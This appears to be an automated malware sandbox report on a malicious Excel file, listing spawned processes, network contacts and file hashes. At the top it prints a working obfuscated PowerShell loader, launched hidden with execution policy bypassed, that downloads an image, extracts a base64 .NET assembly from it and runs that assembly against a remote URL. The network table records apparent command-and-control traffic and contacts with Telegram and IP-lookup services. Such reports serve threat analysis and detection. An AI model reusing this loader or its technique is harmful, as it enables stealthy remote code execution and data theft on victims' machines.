#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBD#@$#G8#@$#bgB2#@$#GU#@$#cgB0#@$#F0#@$#Og#@$#6#@$#EY#@$#cgBv#@$#G0#@$#QgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#EM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#KQ#@$#7#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBS#@$#GU#@$#ZgBs#@$#GU#@$#YwB0#@$#Gk#@$#bwBu#@$#C4#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#F0#@$#Og#@$#6#@$#Ew#@$#bwBh#@$#GQ#@$#K#@$##@$#k#@$#GM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#QgB5#@$#HQ#@$#ZQBz#@$#Ck#@$#Ow#@$#k#@$#HQ#@$#eQBw#@$#GU#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bs#@$#G8#@$#YQBk#@$#GU#@$#Z#@$#BB#@$#HM#@$#cwBl#@$#G0#@$#YgBs#@$#Hk#@$#LgBH#@$#GU#@$#d#@$#BU#@$#Hk#@$#c#@$#Bl#@$#Cg#@$#JwBG#@$#Gk#@$#YgBl#@$#HI#@$#LgBI#@$#G8#@$#bQBl#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C4#@$#RwBl#@$#HQ#@$#TQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#K#@$##@$#n#@$#FY#@$#QQBJ#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#YQBy#@$#Gc#@$#dQBt#@$#GU#@$#bgB0#@$#HM#@$#I#@$##@$#9#@$#C#@$##@$#L#@$##@$#o#@$#Cc#@$#d#@$#B4#@$#HQ#@$#LgBz#@$#GU#@$#bgB5#@$#G0#@$#Lw#@$#4#@$#DQ#@$#Mg#@$#u#@$#DE#@$#NQ#@$#u#@$#DY#@$#Nw#@$#u#@$#D#@$##@$#O#@$##@$#v#@$#C8#@$#OgBw#@$#HQ#@$#d#@$#Bo#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#LgBJ#@$#G4#@$#dgBv#@$#Gs#@$#ZQ#@$#o#@$#CQ#@$#bgB1#@$#Gw#@$#b#@$##@$#s#@$#C#@$##@$#J#@$#Bh#@$#HI#@$#ZwB1#@$#G0#@$#ZQBu#@$#HQ#@$#cw#@$#p#@$##@$#==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.senym/842.15.67.08//:ptth');$method.Invoke($null, $arguments)"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /renew
C:\Users\Admin\AppData\Local\Tempwinlogon.exe
"C:\Users\Admin\AppData\Local\Tempwinlogon.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /renew
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aug.vbs"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff6d0e46f8,0x7fff6d0e4708,0x7fff6d0e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 388 -ip 388
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 388 -s 3664
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2548 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 4608 -ip 4608
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4608 -s 3644
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\69902a92d8b14946b5ce20cbff6aa3aa /t 3204 /p 436
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 628 -p 3740 -ip 3740
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3740 -s 3440
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 404 -p 3204 -ip 3204
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3204 -s 4092
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3204 -s 4092
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 4412 -ip 4412
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4412 -s 3676
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.0.1728769490\1348298946" -parentBuildID 20221007134813 -prefsHandle 1784 -prefMapHandle 1776 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63b6619b-8869-4c1c-b544-288163fb025b} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 1944 1c2bfbd7c58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.1.1884509601\1799933842" -parentBuildID 20221007134813 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b20167a8-cc63-47aa-89e5-91e8544779f1} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 2412 1c2bf6e2258 socket
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.133.255.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.77.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grapemundo.com | udp |
| IN | 103.50.163.157:443 | grapemundo.com | tcp |
| US | 8.8.8.8:53 | 157.163.50.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.33.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | chongmei33.publicvm.com | udp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.144.47.103.in-addr.arpa | udp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | gstatic-node.io | udp |
| US | 188.114.97.0:80 | gstatic-node.io | tcp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 188.114.97.0:80 | gstatic-node.io | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.237.62.211:443 | api.ipify.org | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | 211.62.237.104.in-addr.arpa | udp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 158.101.44.242:80 | checkip.dyndns.org | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | y1qk5g.dm.files.1drv.com | udp |
| US | 8.8.8.8:53 | 13.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.44.101.158.in-addr.arpa | udp |
| US | 13.107.42.12:443 | y1qk5g.dm.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 12.42.107.13.in-addr.arpa | udp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | www.rainbow-industrie.com | udp |
| FR | 178.32.90.242:2550 | www.rainbow-industrie.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | 242.90.32.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 104.237.62.211:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 104.237.62.211:443 | api.ipify.org | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 188.114.96.0:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chongmei33.publicvm.com | udp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 158.101.44.242:80 | checkip.dyndns.org | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chongmei33.publicvm.com | udp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 52.168.117.173:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 173.117.168.52.in-addr.arpa | udp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| US | 8.8.8.8:53 | chongmei33.publicvm.com | udp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| US | 89.117.76.41:4422 | tcp | |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:7045 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
| SG | 103.47.144.122:49746 | chongmei33.publicvm.com | tcp |
Files
memory/1712-343-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp
memory/1712-345-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-344-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp
memory/1712-347-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-346-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp
memory/1712-348-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp
memory/1712-349-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-350-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp
memory/1712-351-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-352-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-353-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-354-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-355-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-356-0x00007FFF3EF40000-0x00007FFF3EF50000-memory.dmp
memory/1712-357-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-358-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-359-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-360-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-361-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-362-0x00007FFF81730000-0x00007FFF81925000-memory.dmp
memory/1712-363-0x00007FFF3EF40000-0x00007FFF3EF50000-memory.dmp
C:\Users\Admin\Desktop\2023-08-17-18\0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1.xls
| MD5 | dcaec797dfb93816d1feac477c300d5c |
| SHA1 | 597e6bc9dcf65338704937865f0755a9869f9cb7 |
| SHA256 | 0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1 |
| SHA512 | 59b996e37339e4f4b7726897328cb5e64012409bbafa2a4de42513d43b5fb11d6fe11569e1d67fb29d08a7c47731ca0686a403b7126c02b7a8cefcedf9f613d0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | bca3d4d518a06072977c41ea814a2311 |
| SHA1 | 75516f0730abd2b15b7a970f18a5246064b8bee9 |
| SHA256 | 9cc6a254dcee27af8848cbefdd392d44d04437d2c8b9cebb76175a68ea53c09a |
